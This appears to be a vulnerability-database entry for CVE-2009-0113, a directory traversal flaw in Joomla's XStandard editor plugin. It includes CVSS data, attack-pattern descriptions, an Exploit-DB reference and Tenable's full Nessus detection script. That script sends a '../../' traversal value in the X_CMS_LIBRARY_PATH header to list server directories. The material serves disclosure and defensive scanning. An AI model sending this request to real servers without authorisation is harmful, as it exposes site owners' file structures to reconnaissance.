Vulnerabilities > CVE-2009-0113 - Path Traversal vulnerability in Joomla Xstandard

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
joomla
CWE-22
nessus
exploit available

Summary

Directory traversal vulnerability in attachmentlibrary.php in the XStandard component for Joomla! 1.5.8 and earlier allows remote attackers to list arbitrary directories via a .. (dot dot) in the X_CMS_LIBRARY_PATH HTTP header.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

descriptionJoomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability. CVE-2009-0113. Webapps exploit for php platform
fileexploits/php/webapps/7691.php
idEDB-ID:7691
last seen2016-02-01
modified2009-01-07
platformphp
port
published2009-01-07
reporterirk4z
sourcehttps://www.exploit-db.com/download/7691/
titleJoomla <= 1.5.8 xstandard editor Local Directory Traversal Vulnerability
typewebapps

Nessus

NASL familyCGI abuses
NASL idJOOMLA_X_CMS_LIBRARY_PATH_TRAVERSAL.NASL
descriptionThe version of Joomla! running on the remote host is distributed with a WYSIWYG editor plugin known as XStandard Lite. This plugin is affected by an information disclosure vulnerability in the attachmentlibrary.php script due to improper sanitization of user-supplied input to the X_CMS_LIBRARY_PATH request header before returning a listing of directories and certain types of files (txt, zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg, jpg, png, and bmp by default). Regardless of whether this plugin has been configured for use with the Joomla! installation, an unauthenticated, remote attacker can exploit this vulnerability, via a specially crafted directory traversal sequence, to disclose the directory trees on the remote host, subject to the privileges of the web server user ID.
last seen2020-06-01
modified2020-06-02
plugin id35321
published2009-01-08
reporterThis script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/35321
titleXStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(35321);
  script_version("1.19");
  script_cvs_date("Date: 2018/06/13 18:56:27");

  script_cve_id("CVE-2009-0113");
  script_bugtraq_id(33143);
  script_xref(name:"EDB-ID", value:"7691");
  script_xref(name:"Secunia", value:"33377");

  script_name(english:"XStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal");
  script_summary(english:"Attempts to list contents of top-level Joomla! directory.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an information disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Joomla! running on the remote host is distributed with
a WYSIWYG editor plugin known as XStandard Lite. This plugin is
affected by an information disclosure vulnerability in the
attachmentlibrary.php script due to improper sanitization of
user-supplied input to the X_CMS_LIBRARY_PATH request header before
returning a listing of directories and certain types of files (txt,
zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg,
jpg, png, and bmp by default). Regardless of whether this plugin has
been configured for use with the Joomla! installation, an
unauthenticated, remote attacker can exploit this vulnerability, via a
specially crafted directory traversal sequence, to disclose the
directory trees on the remote host, subject to the privileges of the
web server user ID.");
  # https://www.joomla.org/announcements/release-news/5226-joomla-159-security-release-now-available.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?11fb9abc");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 1.5.9 or later");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:U/RC:X");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date",value:"2009/01/07");
  script_set_attribute(attribute:"patch_publication_date",value:"2009/01/10");
  script_set_attribute(attribute:"plugin_publication_date",value:"2009/01/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  script_dependencies("joomla_detect.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("installed_sw/Joomla!", "www/PHP");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Target directory (relative to Joomla's 'images/stories' directory).
target_dir = "../../";

# Try to exploit the issue to get a list of directories under target_dir.
url ="/plugins/editors/xstandard/attachmentlibrary.php";

res = http_send_recv3(
  method      : "GET",
  port        : port,
  item        : dir + url,
  add_headers : make_array("X_CMS_LIBRARY_PATH", target_dir),
  exit_on_fail : TRUE
);

if (
  '<library><containers><container><objectName>' >< res[2] &&
  '<path>' +target_dir+ '</path>' >< res[2] ||
  (
    '/administrator/</baseURL>' >< res[2] ||
    '/components/</baseURL>' >< res[2]
  )
)
{
  info = res[2];
  info = ereg_replace(pattern:"><(/?library)>", replace:'>\n  <\\1>', string:info);
  info = ereg_replace(pattern:"><(/?containers)>", replace:'>\n  <\\1>', string:info);
  info = ereg_replace(pattern:"><(container)>", replace:'>\n    <\\1>', string:info);
  info = ereg_replace(pattern:"><(/container)>", replace:'>\n    <\\1>', string:info);
  info = ereg_replace(pattern:"><([^>]+)>", replace:'>\n      <\\1>', string:info);

  security_report_v4(
    port        : port,
    severity    : SECURITY_WARNING,
    generic     : TRUE,
    request     : make_list(http_last_sent_request()),
    output      : chomp(info)
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);